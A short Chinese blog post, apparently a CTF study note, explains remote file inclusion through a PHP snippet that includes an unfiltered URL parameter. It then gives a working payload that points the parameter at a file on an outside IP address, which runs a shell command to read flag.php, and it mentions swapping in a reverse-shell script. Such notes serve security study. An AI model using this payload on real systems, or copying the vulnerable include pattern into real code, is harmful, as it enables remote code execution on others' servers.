远程文件包含(RFI)

漏洞原因

当一段代码看起来像下面这样,且没有做任何过滤时,RFI 就诞生了

<?php
    // 从 URL 获取文件名,例如 ?path=home.php
    $file = $_GET['path'];

    // 直接引入并执行该文件
    include($file); 
?>

一、在服务器上面放置恶意文件

http://120.26.240.12/shell.txt,内容如下:

<?php system('cat /var/www/html/flag.php'); ?>

二、payload如下:

?path=http://120.26.240.12/shell.txt

注:可以直接放那个反弹shell的php脚本,可以接收shell

image-20260528235029535

posted @ 2026-06-18 13:01  Doll_Marker  阅读(9)  评论(0)    收藏  举报